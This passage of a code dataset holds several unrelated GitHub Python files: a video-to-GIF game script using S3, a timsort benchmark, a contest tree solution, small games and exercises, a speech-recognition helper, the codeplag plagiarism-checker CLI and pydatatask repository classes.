videoFile, videoFile[videoFile.find(';')+1:])\n\n return 
videoFile[videoFile.find(';')+1:], player_name, tour\n\n\ndef upload_game_params(awssession, player_name, tour):\n s3 = awssession.resource('s3')\n\n params_json = json.dumps(\n {\n 'answerHash': hashAnswer(player_name.upper()),\n 'tour': tour\n }, indent=4)\n\n s3.Bucket('bageld-inputs').put_object(Key='bageld_params.json',\n Body=params_json)\n\n\ndef gen_folders():\n temp_dir = tempfile.TemporaryDirectory()\n\n frames_path = os.path.join(temp_dir.name, \"frames\")\n dilate_path = os.path.join(temp_dir.name,\n \"diff_gray_dilate_frames\") # image 0\n gray_path = os.path.join(temp_dir.name, \"diff_gray_frames\") # image 1\n diff_path = os.path.join(temp_dir.name, \"diff_frames\") # image 2\n\n today = date.today()\n output_path = os.path.join(temp_dir.name, str(today))\n\n os.mkdir(frames_path)\n os.mkdir(dilate_path)\n os.mkdir(gray_path)\n os.mkdir(diff_path)\n os.mkdir(output_path)\n\n return temp_dir, [\n frames_path, dilate_path, gray_path, diff_path, output_path\n ]\n\n\ndef load_video(videoFile, filepath):\n count = 0\n\n cap = cv2.VideoCapture(videoFile) # capturing the video from the given path\n frameRate = cap.get(5) #frame rate - want to bump it up\n x = 1\n\n first_iter = True\n\n while (cap.isOpened()):\n frameId = cap.get(1) #current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n else:\n filename = f\"{filepath}/frames/frame{str(count).rjust(3, '0')}.jpg\"\n count += 1\n cv2.imwrite(filename, frame)\n # Get average frames\n if first_iter:\n avg = np.float32(frame)\n first_iter = False\n cv2.accumulateWeighted(frame, avg, 0.005)\n background_image = cv2.convertScaleAbs(avg)\n cap.release()\n return background_image\n\n\ndef load_frames(filepath='frames/'):\n col_frames = os.listdir(filepath)\n\n # sort file names\n col_frames.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n # empty list to store the frames\n col_images = []\n\n for i in col_frames:\n # read the frames\n img = cv2.imread(os.path.join(filepath, i))\n # append the frames to the list\n col_images.append(img)\n\n return col_images\n\n\ndef gen_dilated_frames(col_images, background_image, filepath):\n kernel = np.ones((4, 4), np.uint8)\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n # image dilation\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), dilated)\n\n\ndef gen_gray_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), thresh)\n\n\ndef gen_diff_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n\n cv2.imwrite(os.path.join(filepath,\n str(i).rjust(3, '0') + '.png'), diff_image)\n\n\ndef write_video(output_file, 
input_path, fps=60):\n\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(len(file_list)):\n filename = os.path.join(input_path, file_list[i])\n\n #read frames\n img = cv2.imread(filename)\n try:\n height, width, layers = img.shape\n size = (width, height)\n except:\n pass\n\n #inserting the frames into an image array\n frame_array.append(img)\n\n out = cv2.VideoWriter(output_file, cv2.VideoWriter_fourcc(*'DIVX'), fps,\n size)\n\n for i in range(len(frame_array)):\n # writing to a image array\n out.write(frame_array[i])\n\n out.release()\n\n\ndef write_gif(output_file, input_path):\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(0, len(file_list), 4):\n filename = os.path.join(input_path, file_list[i])\n img = Image.open(filename)\n frame_array.append(img)\n\n frame_array[0].save(output_file,\n format='GIF',\n append_images=frame_array[1:],\n save_all=True,\n duration=0,\n loop=0)\n\n\ndef hashAnswer(inputString):\n hash_value = 1\n if len(inputString) == 0:\n return hash_value\n for x in range(len(inputString)):\n ch = ord(inputString[x])\n hash_value = (hash_value * ch) % 100000000 + 1\n return hash_value\n\n\ndef main(cleanup_temp=True):\n today = str(date.today()).replace('-', '')\n\n session = boto3.Session(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = session.client('s3')\n\n videoFile, player_name, tour = get_video(awssession=session, today=today)\n upload_game_params(awssession=session, player_name=player_name, tour=tour)\n\n temp_dir, output_dirs = gen_folders()\n background = load_video(videoFile, temp_dir.name)\n col_images = load_frames(output_dirs[0])\n\n gen_dilated_frames(col_images, background, output_dirs[1])\n write_gif(\"mystery_0.gif\", output_dirs[1])\n\n gen_gray_frames(col_images, background, output_dirs[2])\n write_gif(\"mystery_1.gif\", output_dirs[2])\n\n gen_diff_frames(col_images, background, output_dirs[3])\n write_gif(\"mystery_2.gif\", output_dirs[3])\n\n write_gif(\"mystery_3.gif\", output_dirs[0])\n\n for i in range(4):\n s3_client.upload_file(f'mystery_{i}.gif', 'bagelio-files',\n f'gifs/mystery_{i}.gif')\n\n # need new function to update the database of old games, and delete yesterday's raw video to save s3 space\n\n if cleanup_temp:\n temp_dir.cleanup()\n else:\n return temp_dir\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liufran1/bageledio","sub_path":"clean_files.py","file_name":"clean_files.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9845972971","text":"import time\na = []\n\nfor x in range(100):\n with open(\"input.txt\",\"r\") as f:\n r = f.readlines()\n for i in r: \n row = i.split(\" \")\n a += [int(j) for j in row if j !=\"\"]\n\n# with open(\"input.txt\",\"r\") as f:\n# r = f.readlines()\n# for i in r: \n# row = i.split(\" \")\n# a += [int(j) for j in row if j]\n\n\n\n\nMIN_MERGE = 32\ndef calcMinRun(n):\n r = 0\n while n >= MIN_MERGE:\n r |= n & 1\n n >>= 1\n return n + r\n\ndef insertionSort(a, s, d):\n for i in range(s + 1, d + 1):\n j = i\n while j > s and a[j] < a[j - 1]:\n a[j], a[j - 1] = a[j - 1], a[j]\n j -= 1\n \ndef merge(a, l, m, r):\n \n len1, len2 = m - l + 1, r - m\n left, right = [], []\n for i in range(0, len1):\n left.append(a[l + i])\n for i in range(0, 
len2):\n right.append(a[m + 1 + i])\n \n i, j, k = 0, 0, l\n while i < len1 and j < len2:\n if left[i] <= right[j]:\n a[k] = left[i]\n i += 1\n else:\n a[k] = right[j]\n j += 1\n k += 1\n \n while i < len1:\n a[k] = left[i]\n k += 1\n i += 1\n while j < len2:\n a[k] = right[j]\n k += 1\n j += 1\n \ndef timSort(a):\n n = len(a)\n minRun = calcMinRun(n)\n \n for start in range(0, n, minRun):\n end = min(start + minRun - 1, n - 1)\n insertionSort(a, start, end)\n \n size = minRun\n while size < n:\n \n \n for left in range(0, n, 2 * size):\n \n mid = min(n - 1, left + size - 1)\n right = min((left + 2 * size - 1), (n - 1))\n \n if mid < right:\n merge(a, left, mid, right)\n \n size = 2 * size\n\nstartTime = time.time()\ntimSort(a)\nendTime = time.time()\n\n\nprint(\"Tim sort when n=\",len(a))\nprint(\"Durata executie algoritm:\",endTime-startTime,\" secunde\")","repo_name":"poenaruiulian/sorting_algorithms","sub_path":"8_tim_sort.py","file_name":"8_tim_sort.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43428785895","text":"import sys\nimport math\nimport heapq\nfrom collections import deque\nfp = open('gold_mine_chapter_1_input.txt', 'r')\ntnum = int(fp.readline())\ncase = 1\nf = open(\"c1out.txt\", \"w\")\n\nwhile tnum > 0:\n n = int(fp.readline())\n C = fp.readline().split() \n C = [int(ci) for ci in C]\n max_ans = float('-inf')\n adj = [[] for i in range(n)]\n f.write(\"Case #\"+str(case)+\": \")\n for i in range(n-1):\n ab = fp.readline().split()\n a, b = int(ab[0])-1, int(ab[1])-1\n adj[a].append(b)\n adj[b].append(a)\n \n pathsum = [ 0 for i in range(n)]\n pathsum[0] = C[0]\n L = [ 0 for i in range(n)]\n P = [0 for i in range(n)]\n T = [0 for i in range(n)]\n L[0] = 0\n P[0] = -1\n T[0] = 0\n q = deque([(0, -1, 0)])\n H = 0\n while q:\n node, parent, level = q[0]\n q.popleft()\n for x in adj[node]:\n if x == parent:\n continue\n L[x] = level + 1\n P[x] = node\n pathsum[x] = pathsum[node] + C[x]\n q.append((x, node, level+1)) \n H = max(H, level+1) \n\n if H == 0:\n f.write(str(C[0])+\"\\n\")\n tnum -= 1\n case += 1\n continue\n \n nr = int(math.sqrt(H*1.0)) \n #print nr\n\n def dfs(root, node, parent, nr):\n if L[node] < nr:\n T[node] = root\n elif L[node]%nr == 0:\n T[node] = P[node] \n else:\n T[node] = T[P[node]]\n for x in adj[node]:\n if x == parent:\n continue\n dfs(root, x, node, nr)\n\n def LCA(x, y):\n while T[x] != T[y]:\n if L[x] > L[y]:\n x = T[x] \n else: \n y = T[y]\n while x!= y:\n if L[x] > L[y]:\n x = P[x]\n else:\n y = P[y]\n return x \n\n dfs(0, 0,-1, nr)\n for x in adj[0]:\n max_ans = max(max_ans, pathsum[x])\n for i in range(1, n):\n for j in range(1, n):\n if i == j:\n continue\n if i in adj[j]:\n continue\n if LCA(i, j) == 0:\n max_ans = max(max_ans, pathsum[i] + pathsum[j] - C[0])\n \n for i in range(1, n):\n if i not in adj[0]:\n max_ans = max(max_ans, pathsum[i]) \n \n f.write(str(max_ans)+\"\\n\")\n tnum -= 1\n case += 1\nf.close()\n\n","repo_name":"Shadek07/facebook-hacker-cup","sub_path":"2021/Qualification Round/Goldmine_C1/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"10585986687","text":"import random as r\n\nguess = ['石头', '剪刀', '布', '石头']\nplayer = input(f'{guess[0:3]}:')\nwhile player != 'Q':\n try:\n if player not in guess:\n raise\n CPU = r.choice(guess[0:3])\n print(f'CPU:{CPU}')\n if player == CPU:\n 
print('Draw!')\n elif guess[guess.index(player) + 1] == CPU:\n print('Player Win!')\n else:\n print('CPU win!')\n player = input(f'{guess[0:3]}:')\n except:\n player = input(f'输入有误!{guess[0:3]}:')\n","repo_name":"JMbaozi/absorb","sub_path":"program/猜拳.py","file_name":"猜拳.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"10774566449","text":"'''\n문제 설명\n양의 정수 n이 매개변수로 주어질 때, n이 홀수라면 n 이하의 홀수인 모든 양의 정수의 합을 return 하고 n이 짝수라면 n 이하의 짝수인 모든 양의 정수의 제곱의 합을 return 하는 solution 함수를 작성해 주세요.\n\n입출력 예\nn\tresult\n7\t16\n10\t220\n'''\n\ndef solution(n):\n answer = 0\n if n%2 == 1: # oddoreven = \"odd\" if n%2 == 1 else \"even\" 변수 정의해 홀짝 판단 if oddoreven == \"odd\": \n for i in range(1, n+1, 2):\n answer += i\n else:\n for i in range(2, n+1, 2):\n answer += i*i\n return answer\n\n\n\n# 다른 사람 풀이\ndef solution(n):\n if n%2: # n%2 == 1 즉, 홀수 일때 실행\n return sum(range(1,n+1,2))\n return sum([i*i for i in range(2,n+1,2)])\n\n","repo_name":"etesongg/CodingTest-Practice","sub_path":"programmers/Lv. 0/9-4주/홀짝에 따라 다른 값 반환.py","file_name":"홀짝에 따라 다른 값 반환.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2943193565","text":"import speech_recognition as sr\nrecog = sr.Recognizer()\nmic = sr.Microphone()\n\ndef sysListen():\n with mic as source:\n recog.adjust_for_ambient_noise(source)\n audio = recog.listen(source)\n \n # setup response\n response = {\n \"success\" : True,\n \"error\" : None,\n \"transcription\" : None\n }\n\n # use Google API\n try:\n response[\"transcription\"] = recog.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response[\"transcription\"]\n\n","repo_name":"Siddhant-Ray/SlideEZ","sub_path":"appUtils.py","file_name":"appUtils.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28918250610","text":"\"\"\"\nThis module consist the CLI of the codeplag util and\nnecessary internal classes for it.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom typing import List, Optional\n\nfrom webparsers.types import GitHubContentUrl\n\nfrom codeplag.consts import (\n DEFAULT_GENERAL_REPORT_NAME,\n EXTENSION_CHOICE,\n LANGUAGE_CHOICE,\n MODE_CHOICE,\n REPORTS_EXTENSION_CHOICE,\n UTIL_NAME,\n UTIL_VERSION,\n)\n\n\nclass CheckUniqueStore(argparse.Action):\n \"\"\"Checks that the list of arguments contains no duplicates, then stores\"\"\"\n\n def __call__(\n self,\n _parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: List[str],\n _option_string: Optional[str] = None,\n ):\n if len(values) > len(set(values)):\n raise argparse.ArgumentError(\n self,\n \"You cannot specify the same value multiple times. 
\"\n f\"You provided {values}\",\n )\n setattr(namespace, self.dest, values)\n\n\nclass DirPath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if directory is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_dir():\n raise argparse.ArgumentTypeError(\n f\"Directory '{path}' not found or not a directory.\"\n )\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass FilePath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if file is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_file():\n raise argparse.ArgumentTypeError(f\"File '{path}' not found or not a file.\")\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass CodeplagCLI(argparse.ArgumentParser):\n \"\"\"The argument parser of the codeplag util.\"\"\"\n\n def __add_settings_path(self, subparsers: argparse._SubParsersAction) -> None:\n settings = subparsers.add_parser(\n \"settings\",\n help=f\"Modifies and shows static settings of the '{UTIL_NAME}' util.\",\n )\n\n settings_commands = settings.add_subparsers(\n help=f\"Settings commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"settings\",\n )\n\n # settings modify\n settings_modify = settings_commands.add_parser(\n \"modify\",\n help=f\"Manage the '{UTIL_NAME}' util settings.\",\n )\n settings_modify.add_argument(\n \"-env\",\n \"--environment\",\n help=\"Path to the environment file with GitHub access token.\",\n type=FilePath,\n )\n settings_modify.add_argument(\n \"-r\",\n \"--reports\",\n help=\"If defined, then saves reports about suspect works \"\n \"into provided path.\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n )\n settings_modify.add_argument(\n \"-re\",\n \"--reports_extension\",\n help=\"Extension of saved report files.\",\n type=str,\n choices=REPORTS_EXTENSION_CHOICE,\n )\n settings_modify.add_argument(\n \"-sp\",\n \"--show_progress\",\n help=\"Show progress of searching plagiarism.\",\n type=int,\n choices=[0, 1],\n )\n settings_modify.add_argument(\n \"-t\",\n \"--threshold\",\n help=\"Threshold of analyzer which classifies two work as same. \"\n \"If this number is too large, such as 99, \"\n \"then completely matching jobs will be found. \"\n \"Otherwise, if this number is small, such as 50, \"\n \"then all work with minimal similarity will be found.\",\n type=int,\n choices=range(50, 100),\n metavar=\"{50, 51, ..., 99}\",\n )\n settings_modify.add_argument(\n \"-l\",\n \"--language\",\n help=\"The language of help messages, generated reports, errors.\",\n type=str,\n choices=LANGUAGE_CHOICE,\n )\n\n # settings show\n settings_commands.add_parser(\n \"show\",\n help=f\"Show the '{UTIL_NAME}' util settings.\",\n )\n\n def __add_check_path(self, subparsers: argparse._SubParsersAction) -> None:\n check = subparsers.add_parser(\"check\", help=\"Start searching similar works.\")\n check.add_argument(\n \"-d\",\n \"--directories\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n help=\"Absolute or relative path to a local directories with project files.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"-f\",\n \"--files\",\n metavar=\"FILE\",\n type=FilePath,\n help=\"Absolute or relative path to files on a computer.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"--mode\",\n help=\"Choose one of the following modes of searching plagiarism. 
\"\n \"The 'many_to_many' mode may require more free memory.\",\n type=str,\n choices=MODE_CHOICE,\n default=\"many_to_many\",\n )\n check.add_argument(\n \"-pe\",\n \"--path-regexp\",\n # TODO: Check that it used with listed below options\n help=\"A regular expression for filtering checked works by name. \"\n \"Used with options 'directories', 'github-user' and 'github-project-folders'.\",\n type=str,\n )\n\n check_required = check.add_argument_group(\"required options\")\n check_required.add_argument(\n \"-ext\",\n \"--extension\",\n help=\"Extension responsible for the analyzed programming language.\",\n type=str,\n choices=EXTENSION_CHOICE,\n required=True,\n )\n\n check_github = check.add_argument_group(\"GitHub options\")\n check_github.add_argument(\n \"-ab\",\n \"--all-branches\",\n help=\"Searching in all branches.\",\n action=\"store_true\",\n )\n check_github.add_argument(\n \"-re\",\n \"--repo-regexp\",\n type=str,\n help=\"A regular expression to filter searching repositories on GitHub.\",\n )\n check_github.add_argument(\n \"-gf\",\n \"--github-files\",\n metavar=\"GITHUB_FILE\",\n type=GitHubContentUrl,\n help=\"URL to file in a GitHub repository.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check_github.add_argument(\n \"-gu\", \"--github-user\", type=str, help=\"GitHub organisation/user name.\"\n )\n check_github.add_argument(\n \"-gp\",\n \"--github-project-folders\",\n metavar=\"GITHUB_PROJECT_FOLDER\",\n type=GitHubContentUrl,\n help=\"URL to a GitHub project folder.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n\n def __add_report_path(self, subparsers: argparse._SubParsersAction) -> None:\n report = subparsers.add_parser(\n \"report\",\n help=f\"Handling generated by the {UTIL_NAME} reports as creating html \"\n \"report file or show it on console.\",\n )\n\n report_commands = report.add_subparsers(\n help=f\"Report commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"report\",\n )\n\n # report create\n report_create = report_commands.add_parser(\n \"create\",\n help=\"Generate general report from created some time ago report files.\",\n )\n report_create.add_argument(\n \"-p\",\n \"--path\",\n help=\"Path to save generated general report. \"\n \"If it's directory, than creates file in it with \"\n f\"name '{DEFAULT_GENERAL_REPORT_NAME}'.\",\n required=True,\n type=Path,\n )\n\n def __init__(self):\n super(CodeplagCLI, self).__init__(\n prog=UTIL_NAME,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Program help to find similar parts of source \"\n \"codes for the different languages.\",\n )\n self.add_argument(\n \"-v\",\n \"--version\",\n help=\"Print current version number and exit.\",\n action=\"version\",\n version=f\"{UTIL_NAME} {UTIL_VERSION}\",\n )\n self.add_argument(\n \"--verbose\",\n help=\"Show debug messages.\",\n action=\"store_true\",\n )\n\n subparsers = self.add_subparsers(\n help=\"Commands help.\",\n parser_class=argparse.ArgumentParser,\n required=True,\n metavar=\"COMMAND\",\n dest=\"root\",\n )\n\n self.__add_settings_path(subparsers)\n self.__add_check_path(subparsers)\n self.__add_report_path(subparsers)\n","repo_name":"OSLL/code-plagiarism","sub_path":"src/codeplag/codeplagcli.py","file_name":"codeplagcli.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"11040107019","text":"\"\"\"\nRepositories are arbitrary key-value stores. 
They are the data part of pydatatask.\nYou can store your data in any way you desire and as long as you can write a Repository class to describe it, it can be\nused to drive a pipeline.\n\nThe notion of the \"value\" part of the key-value store abstraction is defined very, very loosely. The repository base\nclass doesn't have an interface to get or store values, only to query for and delete keys. Instead, you have to know\nwhich repository subclass you're working with, and use its interfaces. For example, `MetadataRepository` assumes that\nits values are structured objects and loads them fully into memory, and `BlobRepository` provides a streaming interface\nto a flat address space.\n\"\"\"\nfrom typing import (\n TYPE_CHECKING,\n Any,\n AsyncGenerator,\n AsyncIterable,\n Awaitable,\n Callable,\n Coroutine,\n Dict,\n List,\n Literal,\n Optional,\n overload,\n)\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nimport base64\nimport hashlib\nimport inspect\nimport io\nimport logging\nimport os\nimport string\n\nfrom kubernetes_asyncio.client import V1Pod\nfrom types_aiobotocore_s3.client import S3Client\nimport aiofiles.os\nimport aiohttp.client_exceptions\nimport aioshutil\nimport botocore.exceptions\nimport docker_registry_client_async\nimport dxf\nimport motor.motor_asyncio\nimport yaml\n\nfrom .utils import AReadStream, AReadText, AWriteStream, AWriteText, roundrobin\n\nif TYPE_CHECKING:\n from .task import ExecutorTask, KubeTask\n\nl = logging.getLogger(__name__)\n\n__all__ = (\n \"Repository\",\n \"BlobRepository\",\n \"MetadataRepository\",\n \"FileRepositoryBase\",\n \"FileRepository\",\n \"DirectoryRepository\",\n \"S3BucketRepository\",\n \"S3BucketInfo\",\n \"MongoMetadataRepository\",\n \"InProcessMetadataRepository\",\n \"InProcessBlobStream\",\n \"InProcessBlobRepository\",\n \"DockerRepository\",\n \"LiveKubeRepository\",\n \"ExecutorLiveRepo\",\n \"AggregateOrRepository\",\n \"AggregateAndRepository\",\n \"BlockingRepository\",\n \"YamlMetadataRepository\",\n \"YamlMetadataFileRepository\",\n \"YamlMetadataS3Repository\",\n \"RelatedItemRepository\",\n)\n\n\ndef job_getter(f):\n \"\"\"\n Use this function to annotate non-abstract methods which take a job identifier as their first parameter. This is\n used by RelatedItemRepository to automatically translate job identifiers to related ones.\n \"\"\"\n if not inspect.iscoroutinefunction(f):\n raise TypeError(\"only async functions can be job_getters\")\n f.is_job_getter = True\n return f\n\n\nclass Repository(ABC):\n \"\"\"\n A repository is a key-value store where the keys are names of jobs. Since the values have unspecified semantics, the\n only operations you can do on a generic repository are query for keys.\n\n A repository can be async-iterated to get a listing of its members.\n \"\"\"\n\n CHARSET = CHARSET_START_END = string.ascii_letters + string.digits\n\n @classmethod\n def is_valid_job_id(cls, job: str):\n \"\"\"\n Determine whether the given job identifier is valid, i.e. 
that it contains only valid characters\n (numbers and letters by default).\n \"\"\"\n return (\n 0 < len(job) < 64\n and all(c in cls.CHARSET for c in job)\n and job[0] in cls.CHARSET_START_END\n and job[-1] in cls.CHARSET_START_END\n )\n\n async def filter_jobs(self, iterator: AsyncIterable[str]) -> AsyncIterable[str]:\n \"\"\"\n Apply `is_valid_job_id` as a filter to an async iterator.\n \"\"\"\n async for job in iterator:\n if self.is_valid_job_id(job):\n yield job\n else:\n l.warning(\"Skipping %s %s - not a valid job id\", self, repr(job))\n\n async def contains(self, item):\n \"\"\"\n Determine whether the given job identifier is present in this repository.\n\n The default implementation is quite inefficient; please override this if possible.\n \"\"\"\n async for x in self:\n if x == item:\n return True\n return False\n\n def __aiter__(self):\n return self.filter_jobs(self.unfiltered_iter())\n\n @abstractmethod\n async def unfiltered_iter(self) -> AsyncGenerator[str, None]:\n \"\"\"\n The core method of Repository. Implement this to produce an iterable of every string which could potentially\n be a job identifier present in this repository. When the repository is iterated directly, this will be filtered\n by `filter_jobs`.\n \"\"\"\n raise NotImplementedError\n # noinspection PyUnreachableCode\n yield None # pylint: disable=unreachable\n\n @abstractmethod\n async def info(self, job) -> Any:\n \"\"\"\n Returns an arbitrary piece of data related to job. Notably, this is used during templating.\n This should do something meaningful even if the repository does not contain the requested job.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def delete(self, job):\n \"\"\"\n Delete the given job from the repository. This should succeed even if the job is not present in this repository.\n \"\"\"\n raise NotImplementedError\n\n async def info_all(self) -> Dict[str, Any]:\n \"\"\"\n Produce a mapping from every job present in the repository to its corresponding info. The default implementation\n is somewhat inefficient; please override it if there is a more effective way to load all info.\n \"\"\"\n return {job: await self.info(job) async for job in self}\n\n async def validate(self):\n \"\"\"\n Override this method to raise an exception if for any reason the repository is misconfigured. 
This will be\n automatically called by the pipeline on opening.\n \"\"\"\n\n def map(\n self, func: Callable, filt: Optional[Callable[[str], Awaitable[bool]]] = None, allow_deletes=False\n ) -> \"MapRepository\":\n \"\"\"\n Generate a :class:`MapRepository` based on this repository and the given parameters.\n \"\"\"\n return MapRepository(self, func, filt, allow_deletes=allow_deletes)\n\n\nclass MapRepository(Repository):\n \"\"\"\n A MapRepository is a repository which uses arbitrary functions to map and filter results from a base repository.\n \"\"\"\n\n def __init__(\n self,\n base: Repository,\n func: Callable[[Any], Coroutine[None, None, Any]],\n filt: Optional[Callable[[str], Awaitable[bool]]] = None,\n allow_deletes=False,\n ):\n \"\"\"\n :param func: The function to use to translate the base repository's `info` results into the mapped `info`\n results.\n :param filt: Optional: An async function to use to determine whether a given key should be considered part of\n the mapped repository.\n :param allow_deletes: Whether the delete operation will do anything on the mapped repository.\n \"\"\"\n self.base = base\n self.func = func\n self.filter = filt\n self.allow_deletes = allow_deletes\n\n async def contains(self, item):\n if self.filter is None or await self.filter(item):\n return await self.base.contains(item)\n return False\n\n async def delete(self, job):\n if self.allow_deletes:\n await self.base.delete(job)\n\n async def unfiltered_iter(self):\n async for item in self.base.unfiltered_iter():\n if self.filter is None or await self.filter(item):\n yield item\n\n async def info(self, job):\n return await self.func(await self.base.info(job))\n\n async def info_all(self) -> Dict[str, Any]:\n result = await self.base.info_all()\n to_remove = []\n for k, v in result.items():\n if self.filter is None or await self.filter(k):\n result[k] = await self.func(v)\n else:\n to_remove.append(k)\n for k in to_remove:\n result.pop(k)\n return result\n\n\nclass MetadataRepository(Repository, ABC):\n \"\"\"\n A metadata repository has values which are small, structured data, and loads them entirely into memory, returning\n the structured data from the `info` method.\n \"\"\"\n\n @abstractmethod\n async def info(self, job):\n \"\"\"\n Retrieve the data with key ``job`` from the repository.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def dump(self, job, data):\n \"\"\"\n Insert ``data`` into the repository with key ``job``.\n \"\"\"\n raise NotImplementedError\n\n\nclass BlobRepository(Repository, ABC):\n \"\"\"\n A blob repository has values which are flat data blobs that can be streamed for reading or writing.\n \"\"\"\n\n @overload\n async def open(self, job: str, mode: Literal[\"r\"]) -> AReadText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"rb\"]) -> AReadStream:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"w\"]) -> AWriteText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"wb\"]) -> AWriteStream:\n ...\n\n @abstractmethod\n async def open(self, job, mode=\"r\"):\n \"\"\"\n Open the given job's value as a stream for reading or writing, in text or binary mode.\n \"\"\"\n raise NotImplementedError\n\n\nclass FileRepositoryBase(Repository, ABC):\n \"\"\"\n A file repository is a local directory where each job identifier is a filename, optionally suffixed with an\n extension before hitting the filesystem. 
This is an abstract base class for other file repositories which have more\n to say about what is found at these filepaths.\n \"\"\"\n\n def __init__(self, basedir, extension=\"\", case_insensitive=False):\n self.basedir = Path(basedir)\n self.extension = extension\n self.case_insensitive = case_insensitive\n\n async def contains(self, item):\n return await aiofiles.os.path.exists(self.basedir / (item + self.extension))\n\n def __repr__(self):\n return f'<{type(self).__name__} {self.basedir / (\"*\" + self.extension)}>'\n\n async def unfiltered_iter(self):\n for name in await aiofiles.os.listdir(self.basedir):\n if self.case_insensitive:\n cond = name.lower().endswith(self.extension.lower())\n else:\n cond = name.endswith(self.extension)\n if cond:\n yield name[: -len(self.extension) if self.extension else None]\n\n async def validate(self):\n self.basedir.mkdir(exist_ok=True, parents=True)\n if not os.access(self.basedir, os.W_OK):\n raise PermissionError(f\"Cannot write to {self.basedir}\")\n\n def fullpath(self, job) -> Path:\n \"\"\"\n Construct the full local path of the file corresponding to ``job``.\n \"\"\"\n return self.basedir / (job + self.extension)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The templating info provided by a file repository is the full path to the corresponding file as a string.\n \"\"\"\n return str(self.fullpath(job))\n\n\nclass FileRepository(FileRepositoryBase, BlobRepository):\n \"\"\"\n A file repository whose members are files, treated as streamable blobs.\n \"\"\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n return aiofiles.open(self.fullpath(job), mode)\n\n async def delete(self, job):\n try:\n await aiofiles.os.unlink(self.fullpath(job))\n except FileNotFoundError:\n pass\n\n\nclass DirectoryRepository(FileRepositoryBase):\n \"\"\"\n A file repository whose members are directories.\n \"\"\"\n\n def 